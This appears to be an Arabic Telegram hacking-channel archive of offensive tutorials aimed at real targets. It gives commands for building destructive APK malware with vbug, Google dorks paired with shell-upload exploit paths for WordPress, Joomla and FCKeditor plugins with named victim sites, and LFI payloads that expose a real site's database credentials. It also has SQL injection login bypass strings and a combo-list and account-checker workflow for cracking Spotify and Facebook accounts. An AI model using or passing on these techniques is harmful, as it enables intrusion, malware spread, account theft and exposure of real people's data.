The Hacking Library
351 subscribers
874 photos
19 videos
44 files
1.3K links
محتوي القناه هو عباره عن تجميع
القناه عباره عن ارشيف للهكرز الأخلاقيات وغير الأخلاقيين
استمتعوا😀👍
Download Telegram
#الدرس_13
شرحي اليوم عن اداة vbug و هي طريقة سهلة لعمل فايروس مدمر للاجهزة
اول انا غير مسؤل تماما عن طريقة استخدامك لهذه الاداة
git clone https://github.com/Junior60/vbug
CD vbug
ls
chmod +x vbug
python2 vbug.py
كدا الاداة بتفتح معاك تقوم تختار رقم الذي يقابل نوع الجغهز اللي اتا عايز الفايروس من اجله بعداك نوع الفايروس e لاطبيقات ال apk بعداك
ls
 بتلقا الفايروس مع ملفات الاداة
بعداك تدي
cp اسم الفيروس /sdcard
عشان تنقله لزاكرة الجهاز طبعا لسا بكون في نسخة من الفايروس في ملفات الاداة تدي الامر
rm -rf اسم الفايورس
لمسحه
يلا الفايروس دا لو اديتو لي زول مجرد ما يعمل ليه تثبيت عليه العوض


الشرح مقدم من
#CS
الدورك

inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html



مثال موقع

http://kybloodcenter.org/hospital/wp...load/test.html
وهذا ايضا
http://celiaflores.net/wp-content/pl...load/test.html
==========================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
==========================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

==========================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

==========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html

==========================================
الدورك
: inurllugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php



#CS
احبائي واصدقائي الاعضاء الكرام
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html

مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html

============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php

============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif

#CS
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
 ثغرة Local File Include

بسم الله الرحمن الرحيم
اخواني الكرام 
السلام عليكم و رحمة الله وبركاته 
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=index  


طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!! 
والمراد من فك التشفير هو الحصول على ملف الكونيفق 
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=config_inc  

الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة 
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom


#CS
##################################################
# Exploit Title: Wordpress woocommerce product options Upload Shell
# Google Dork :
# N/A
# Date: 16/05/2019
# Exploit Author: ArkealoGeNDz
# Tested on: Kali linux 2.0 / Mozilla Firefox
# Vulnerability : http://www.website.dz//woocommerce-product-options/includes/image-upload.php
# Use Burp Suite To Upload Shell
# Path Shell : /wp-content/plugins/woocommerce-product-options/uploads/numbers-letters/shell.php
# Path Shell 2 : /wp-content/uploads/2019/05/shell.php
##################################################
# Demo:

# https://www.pestamps.com/wp-content/plugins/woocommerce-product-options/uploads/3f59b09a5a/ArkealoGeNDz.png

# https://www.numerim.bzh/wp-content/plugins/woocommerce-product-options/uploads/92c7372df6/ArkealoGeNDz.png

# https://lvrparis.fr/wp-content/plugins/woocommerce-product-options/uploads/49dde56d2f/ArkealoGeNDz.png

# https://designmummy.com.au/wp-content/plugins/woocommerce-product-options/uploads/4a5eb89316/ArkealoGeNDz.png

#################################################
# Telegram: @ArkealoGeNDz
#################################################
الثغرة
 Local File Disclosure in wordpress theme Diarise


الدورك
 inurl:"wp-content/themes/diarise/"

الاستغلال

http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]

#CS
الدورك    intext:"ISPROJEK"


بعدها العثور علي لوحه التحكم


راح يكون اليوزر و الباس تبعهم


user: ' or 1=1 limit 1 -- -+

 password: ' or 1=1 limit 1 -- -+


الثاني



الدورك

filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php






الدورك
inurl:"index.php?mnu=login"


الاستخدام

/ index.php?mnu=admin


الدورك

intext:"Powered by iyiWebSitesi"


الاستخدام

لوحه التحكم


testpage.com/admin
sql bypass
 id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#


#cs
 ثغرة   PHPMiniAdmin 1.9 Database Open No-Secure Exploit


الدورك   

inurl:phpminiadmin.php


الاستغلال


https://site.com/salon/db/phpminiadmin.php



#CS
ثغرة ال
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure


الدورك 
inurl:''/index.php?option=com_rsfirewall''


أو


 inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net


أو

intext:Designed by Artilabio



الاستغلال


ممكن نسحب اللسته تبع الباسورد

/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt


أو الوصول لقاعدة  البيانات

/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql

 /administrator/components/com_rsfirewall/sql/mysql/configuration.sql


/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql


/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql


 /administrator/components/com_rsfirewall/

وغيرها من القواعد


مثال


www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt



#CS
السلام عليكم ورحمة الله وبركاته

شرقي اليوم كيفيه  تكريك حسابات سبوتيفاي+فيسبوك+upaly+madiafire+fortnight+hule
  سهل جداا
سنتحتاج الي اداتين هما 
الاتشكر والكومبو البريفيت
 
اولا قم بفتح termux  

اولا علينا تثبيت أداة الكومبو وظيفتها  استخراج  كومبو من التيرمكس

اوامرها
 

pkg install php git -y



git clone https://github.com/Juni0r007/PasTerm.git



cd PasTerm

chmod +x *

php pasterm.php

راح تفتح معك الأداة

و بعدها
راح يطلب لك تكتب key word راح تنسخ
 الموجود بالأسفل و تلصقه علي termux

 
@gmail.com,@yahoo.com,@hotmail.com,@aol.com.@hotmail.co.uk,@hotmail.fr,@msn.com,@yahoo.fr,@wanadoo.fr,@orange.fr,@comcast.net,@yahoo.co.uk,@yahoo.com.br,@yahoo.co.in,@live.com


و بعدها راح يقول لك اكتب اسم لهذة اللسته
  انا كتبت saja

و بعدها راح يطلع لك مسار التم الاحتفاظ به

مثل هذا

/data/data/com.termux/files/home/saja.txt


كذا انتهينا من الأداة الاولي و تم استخراج للسته
 قويه من والكومبو


راح بندا الجزء الثاني و هو  تثبيت اداة اتشكر الاكونتات

 نفتح صفحه جديدة و نكتب الأوامر التاليه


 
1- rm -rif  PasTerm
apt update&&apt upgrade -y

2-termux-setup-storage

3- pkg install php git -y


4- git clone https://github.com/Juni0r007/AIOChk.git


5- ls


6- cd AIOChk


7- chmod +x *


8- php aio.php



و بعدها راح تشتغل الأداة
و راح نختار الرقم واحد

راح يطلب منك المساء الموجود به كومبو راح تكتب المسار الاعطتك ياه الأداة السابقه مثل هذا

/data/data/com.termux/files/home/saja.txt

 و بعدها راح يطلع لك مجموعه من الايميلات مع الباسورد تبعها

استمتعوووو

(شباب الشرح دا انا بريئه منكم لو في حد استخدمه بطريقه سيئه)


#CS
# اسم الثغرة : Joomla com_admin Components from V2.5.4 to V3.7.4
Database Backup Arbitrary File Download Vulnerability



# الدورك
   inurl:''/administrator/components/com_admin/sql/''
# نوع الثغرة   متوسطة
#################################################################################################

# مسار لوحه التحكم :

/administrator

#################################################################################################

# الاستغلالات  :



/joomla/administrator/components/com_admin/sql/others/mysql/......

/PATH/PATH/administrator/components/com_admin/sql/others/mysql/......

/PATH/administrator/components/com_admin/sql/updates/mysql/......

/administrator/components/com_admin/sql/updates/mysql/......

/administrator/components/com_admin/sql/updates/postgresql/.......

/administrator/components/com_admin/sql/updates/sqlazure/......

/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql

/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql

/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql

/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql

/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql

/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql

#################################################################################################

# أمثلة لمواقع مصابة  =>

[+]
xpilot-ai.org/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql

[+]



#CS
الاسم : SO-AT Solution CMS Bypass SQL Login


الدورك  inurl:/coop/re_register.php


الاستغلال


/coop/adminlogon.php



User: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+



أمثلة

 http://healthcoop.or.th/coop/adminlogon.php



 http://www.tot-coop.com/coop/adminlogon.php



#CS
الاسم    Server Info

الدورك

inurl:"debug/default/view?panel=config"


راح تطلع لك مواقع كثيرة

مجرد ما تدخل لها راح يعطيك معلومات
وايضا اسم المستخدم وكلمة المرور

#CS
ثغرة  (FTP2FTP ( Arbitrary File Download :
الدورك  
: inurl:/download2.php?id=

الاستغلال


http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php

مثال


http://www.supersat.cz/download/azbox/download2.php?id=23

after exploit :

http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================



#CS
السلام عليكم ورحمة الله وبركاته
شرحي اليوم شوي بسيط
وهو تحميل مقطع من الفيس بوك

عن طريق أداة Facebook-Video-Downloader


الأوامر


git clone https://github.com/Tuhinshubhra/Facebook-Video-Downloader

cd Facebook-Video-Downloader

php fb.php

enter URL for example (https://www.facebook.com/cctvcom/videos/1410869539034155/)

بعدها ح يطلب اسم للملف حقك
مثلا انا اخترت rubics



#CS
السلام عليكم ورحمة الله وبركاته
أداة TM-scanner رائعه تحتوي الكثير من الأدوات و طريقه استخدمها

الأوامر


git clone https://github.com/TechnicalMujeeb/TM-scanner

cd TM-scanner

chmod +x * sh install.sh

python2 tmscanner.py


#CS
Get Proxy 💯👌
😀

1⃣ apt update
2⃣ apt upgrade
3⃣ pkg install python2
4⃣ pkg install git
5⃣ git clone https://github.com/siruidops/proxy
6⃣ cd proxy
7⃣ pip install -r requirements.txt
8⃣ python2 proxy.py


#CS
Upload shell & SQLi :
~~~~~~~~~~~~~~~~~
Dorks#
|~
inurl:"post.php?p_id="
inurl:"/category.php?category="
—————————————-
Exploit#
|~

مثال

http://[target]/assets/images/profile_pics/your shell.phtml
——————————————

#CS